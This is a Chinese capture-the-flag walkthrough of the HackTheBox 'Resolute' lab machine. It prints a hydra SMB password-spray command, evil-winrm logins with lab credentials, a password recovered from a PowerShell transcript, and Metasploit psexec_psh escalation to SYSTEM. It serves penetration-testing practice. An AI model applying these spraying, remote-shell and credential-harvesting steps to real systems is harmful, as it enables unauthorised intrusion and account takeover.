大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Resolute”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为中等级别,任务是找到靶机上的user.txt和root.txt。
信息收集
连接ovpn,获取内网IP,先用nmap对目标主机扫一遍,进行信息收集,获取开放的端口和服务。
l 探测开放端口与服务
l 发现端口88、135、139、389、445、3268等一些存活的端口。
l 其中445端口使用的是smb服务。
l 再次利用enum4linux扫描(enum4linux可用于枚举Windows和Samba主机中的数据),获得有价值信息。
爆破连接
l 使用smbclient连接marko,连接失败
l 猜想:虽然无法连接,但是也许可以进行用户名爆破。利用enumlinux4扫描出的用户名组成字典文本account,使用密码Welcome123!,结合hydra工具爆破出用户名。
hydra -L /home/resolute/account.txt -p Welcome123! 10.10.10.169 smbl 结果显示存在用户名melanie可登录,利用smbclient进行登录。
[445][smb] host: 10.10.10.169 login: melanie password: Welcome123!
l 再次使用smbclient工具,尝试使用账号melanie,密码Welcome123!进行连接。
l 接下来尝试使用melanie 账号,利用evil-winrm(一款可用于黑客攻击/渗透测试的Windows远程管理(WinRM) Shell工具)进行登录
ruby evil-winrm.rb -u melanie -p Welcome123! -i 10.10.10.169root@kali:/home/resolute/evil-winrm# ruby evil-winrm.rb -u melanie -p Welcome123! -i 10.10.10.169Evil-WinRM shell v2.1Info: Establishing connection to remote endpoint*Evil-WinRM* PS C:UsersmelanieDocuments> cd /Users*Evil-WinRM* PS C:Users> lsDirectory: C:UsersMode LastWriteTime Length Name---- ------------- ------ ----d----- 9/25/2019 10:43 AM Administratord----- 12/4/2019 2:46 AM melanied-r--- 11/20/2016 6:39 PM Publicd----- 1/18/2020 3:28 AM ryan
l 获得Users权限,并发现ryan用户
提权
*Evil-WinRM* PS C:UsersmelanieDesktop> whoami /groupsGROUP INFORMATION-----------------Group Name Type SID Attributes========================================== ================ ============ ==================================================Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled groupBUILTINRemote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled groupBUILTINUsers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled groupBUILTINPre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled groupNT AUTHORITYNETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled groupNT AUTHORITYAuthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled groupNT AUTHORITYThis Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled groupNT AUTHORITYNTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
l 成功登录
l 浏览C盘所有文件(包括隐藏文件),查看能否获取到敏感信息。
*Evil-WinRM* PS C:> ls -hiddenDirectory: C:Mode LastWriteTime Length Name---- ------------- ------ ----d--hs- 12/3/2019 6:40 AM $RECYCLE.BINd--hsl 9/25/2019 10:17 AM Documents and Settingsd--h-- 9/25/2019 10:48 AM ProgramDatad--h-- 12/3/2019 6:32 AM PSTranscriptsd--hs- 9/25/2019 10:17 AM Recoveryd--hs- 9/25/2019 6:25 AM System Volume Information-arhs- 11/20/2016 5:59 PM 389408 bootmgr-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT-a-hs- 1/17/2020 5:52 PM 402653184 pagefile.sys
l 进入PSTranscripts文件夹中,发现了日志文件20191203063201.txt,打开日志文件
*Evil-WinRM* PS C:PSTranscripts20191203> ls -hiddenDirectory: C:PSTranscripts20191203Mode LastWriteTime Length Name---- ------------- ------ -----arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txtPS>CommandInvocation(Invoke-Expression): "Invoke-Expression">> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \fs01backups ryan Serv3r4Admin4cc123!
l 得到rayn的密码 Serv3r4Admin4cc123!
l 使用模块msf的psexec_psh,配置好目标IP,用户名、密码,开始利用。
l 成功获取system权限
总结:
1、 信息收集过程中要利用好每个信息,尝试找到突破口(smb服务)。
2、 熟练使用工具enum4linux、evil-winrm、msf等工具,提高效率。
3、 应多尝试,从多方面入手,找不到密码可以从账号入手等等。
4、 要加强学习,增进对漏洞的认识与利用,才能不断进步。
本文始发于微信公众号(Khan安全攻防实验室):Hack the Box – Resolute
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论